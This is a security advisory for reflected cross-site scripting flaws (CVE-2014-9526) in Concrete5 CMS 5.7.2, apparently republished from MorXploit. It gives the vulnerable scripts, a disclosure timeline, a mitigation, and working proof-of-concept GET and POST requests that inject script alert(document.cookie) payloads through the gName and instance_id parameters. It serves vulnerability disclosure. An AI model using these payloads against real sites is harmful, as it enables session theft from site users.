Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities

2014-12-10 / 2015-01-06
Credit: Simo Ben youssef
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2014-9526
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Title: Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities Author: Simo Ben youssef Contact: Simo_at_Morxploit_com Discovered: 02 November 2014 Updated: 9 December 2014 Published: 9 December 2014 MorXploit Research http://www.MorXploit.com Vendor: Concrete5 Vendor url: www.concrete5.org Software: Concrete5 CMS Versions: 5.7.2 and 5.7.2.1 (probably older) Status: Unpatched Vulnerable scripts: single_pages/dashboard/users/groups/bulkupdate.php tools/dashboard/sitemap_drag_request.php Original document: http://morxploit.com/morxploits/morxconxss.txt About Concrete5 (from Wikipedia): Concrete5 is an open source content management system (CMS) for publishing content on the World Wide Web and intranets. Concrete5 was designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page. It provides version management for every page, similar to wiki software, another type of web site development software. concrete5 allows users to edit images through an embedded editor on the page. To learn more please visit: http://en.wikipedia.org/wiki/Concrete5 http://www.concrete5.org/ Description: Concrete5 is vulnerable to Cross-Site Scripting, both bulkupdate.php and sitemap_drag_request.php scripts fail to properly sanitize user-supplied input. PoC Exploit: bulkupdate.php XSS is exploitable through $_REQUEST['gName'] Using HTTP GET Method: http://target/index.php/dashboard/users/groups/bulkupdate/search?gName=";><script>alert(document.cookie)</script>&ccm-submit-button=Search Using HTTP POST Method: POST http://target/index.php/dashboard/users/groups/bulkupdate/search POST DATA: gName="><script>alert(document.cookie)</script>&ccm-submit-button=Search sitemap_drag_request.php XSS is triggered through $_REQUEST['instance_id'] but requires a valid ccm_token value which makes it unexploitable (unless the attacker somehow obtains a valid token) Using HTTP GET Method: http://target/index.php/tools/required/dashboard/sitemap_drag_request?origCID=147&destCID=148&instance_id=";><BODY ONLOAD=alert(document.cookie)>&ctask=MOVE&ccm_token=1418116264:3ac1b1774e77fbc61b1c6b97a4f7c9ea&dragMode=over Mitigation: Validate/Sanitize user supplied-input through $_REQUEST['gName'] and $_REQUEST['instance_id'] Disclosure time-line 02 November 2014: Discovery. 03 November 2014: Initial report sent. 11 November 2014: Second contact. No response. 09 December 2014: Public disclosure. Author disclaimer: The information contained in this entire document is for educational, demonstration and testing purposes only. Author cannot be held responsible for any malicious use or damage. Use at your own risk.

References:

http://morxploit.com/morxploits/morxconxss.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top